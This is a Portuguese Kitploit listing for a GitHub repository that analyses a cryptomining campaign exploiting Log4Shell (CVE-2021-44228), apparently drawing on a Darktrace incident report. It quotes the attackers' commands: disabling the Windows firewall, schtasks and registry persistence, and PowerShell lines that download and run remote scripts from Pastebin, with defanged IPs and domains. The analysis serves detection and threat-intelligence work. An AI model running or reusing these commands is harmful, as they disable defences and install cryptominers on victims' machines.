Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4j-Vulnerability — Análise educacional da vulnerabilidade Log4Shell (CVE-2021-44228), detalhando sua exploração em uma campanha de mineração de criptomoedas com IoCs, mapeamento MITRE ATT&CK e orientações de detecção. | Kitploit
Ferramentas/GitHubGitHub/demining/log4j-vulnerability
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesExploraçãoAnálise de MalwareInteligência de AmeaçasAprendizado e Educação
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Análise educacional da vulnerabilidade Log4Shell (CVE-2021-44228), detalhando sua exploração em uma campanha de mineração de criptomoedas com IoCs, mapeamento MITRE ATT&CK e orientações de detecção.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver RepositórioSite
6254há 3 anosAinda não revisado
Compartilhar

Vulnerabilidade Log4j



Exploit no código de mineração de criptomoedas que usou uma vulnerabilidade perigosa do Log4j
  • Tutorial: https://youtu.be/PNDBjoT83zA
  • Tutorial: https://cryptodeeptech.ru/log4j-vulnerability


Contexto sobre o Log4j

A Equipe de Segurança em Nuvem da Alibaba divulgou publicamente uma vulnerabilidade crítica (CVE-2021-44228) que permite execução remota de código não autenticada em múltiplas versões do Apache Log4j2 (Log4Shell). Servidores vulneráveis podem ser explorados por atacantes conectando-se via qualquer protocolo, como HTTPS, e enviando uma string especialmente criada.

Campanha de cripto-mineração usando Log4j

A Darktrace detectou atividade de cripto-mineração em várias implantações de clientes, resultante da exploração desta vulnerabilidade do Log4j. Em cada um desses incidentes, a exploração ocorreu por meio de conexões SSL de saída que pareciam solicitações de scripts PowerShell codificados em base64 para contornar as defesas de perímetro e baixar arquivos de script batch (.bat) e múltiplos executáveis que instalam malware de cripto-mineração. A atividade apresentou indicadores de campanha mais amplos, incluindo IPs fixos comuns, arquivos executáveis e scripts.

O ciclo de ataque começa com o que parece ser uma varredura oportunista de dispositivos conectados à Internet em busca de servidores VMWare Horizons vulneráveis ao exploit Log4j. Uma vez encontrado um servidor vulnerável, o atacante faz conexões HTTP e SSL com a vítima. Após a exploração bem-sucedida, o servidor realiza um callback na porta 1389, recuperando um script chamado mad_micky.bat. Isso realiza o seguinte:

  • Desativa o firewall do Windows, definindo todos os perfis como estado=off
    ‘netsh advfirewall set allprofiles state off’
  • Procura por processos existentes que indiquem outras instalações de mineradores usando ‘netstat -ano | findstr TCP’ para identificar qualquer processo operando nas portas :3333, :4444, :5555, :7777, :9000 e interrompe os processos em execução
  • Um novo webclient é iniciado para baixar silenciosamente o wxm.exe
  • Tarefas agendadas são usadas para criar persistência. O comando ‘schtasks /create /F /sc minute /mo 1 /tn –‘ agenda uma tarefa e suprime avisos. A tarefa deve ser agendada dentro de um minuto do comando e recebe o nome ‘BrowserUpdate’, apontando para o domínio malicioso ‘b.oracleservice[.]top’ e IPs fixos: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
  • Chaves de registro são adicionadas em RunOnce para persistência: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

Em pelo menos dois casos, o script mad_micky.bat foi recuperado em uma conexão HTTP que tinha o user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). Esta foi a primeira e única vez que este user agent foi visto nessas redes. Parece que este user agent é usado legitimamente por alguns dispositivos ASUS com instalações de fábrica novas; no entanto, como um novo user agent visto apenas durante esta atividade, é suspeito.

Após a exploração bem-sucedida, o servidor realiza um callback na porta 1389 para recuperar arquivos de script. Neste exemplo, /xms.ps1 é um script PowerShell codificado em base64 que contorna a política de execução no host para chamar ‘mad_micky.bat’:

Exploit no código de mineração de criptomoedas que usou uma vulnerabilidade perigosa do Log4j

Figura 1: Informação adicional sobre o script PowerShell xms.ps1

O instantâneo detalha o log de eventos de um servidor afetado e indica um RCE bem-sucedido do Log4j que resultou no download do arquivo mad_micky.bat:

Exploit no código de mineração de criptomoedas que usou uma vulnerabilidade perigosa do Log4j

Figura 2: Dados de log destacando o arquivo mad_micky.bat

Conexões adicionais foram iniciadas para recuperar arquivos executáveis e scripts. Os scripts continham dois endereços IP localizados na Coreia e na Ucrânia. Uma conexão foi feita ao IP ucraniano para baixar o arquivo executável xm.exe, que ativa o minerador. O minerador, XMRig Miner (neste caso), é uma ferramenta de mineração de código aberto e multiplataforma, disponível para download em vários locais públicos. O próximo download de exe observado foi para ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Exploit no código de mineração de criptomoedas que usou uma vulnerabilidade perigosa do Log4j

Figura 3: Informação adicional sobre o executável XMRig

A conexão ao IP coreano envolveu uma solicitação de outro script (/2.ps1) e de um arquivo executável (LogBack.exe). Este script exclui tarefas em execução associadas a logging, incluindo o filtro de log de eventos do SCM ou o consumidor de log de eventos do PowerShell. O script também solicita um arquivo do Pastebin, que possivelmente é um arquivo de configuração do Cobalt Strike beacon. As exclusões de log foram realizadas por meio de tarefas agendadas e WMI, incluindo: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

  • Arquivo de configuração (não mais hospedado): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

O segundo arquivo solicitado do Pastebin, embora não mais hospedado pelo Pastebin, faz parte de um comando schtasks, portanto, provavelmente usado para estabelecer persistência:

  • schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System

O arquivo executável Logback.exe é outra ferramenta de mineração XMRig. Um arquivo config.json também foi baixado do mesmo IP coreano. Após isso, comandos cmd.exe e wmic foram usados para configurar o minerador.

Esses downloads de arquivos e a configuração do minerador foram seguidos por conexões adicionais ao Pastebin.

Baixar ferramenta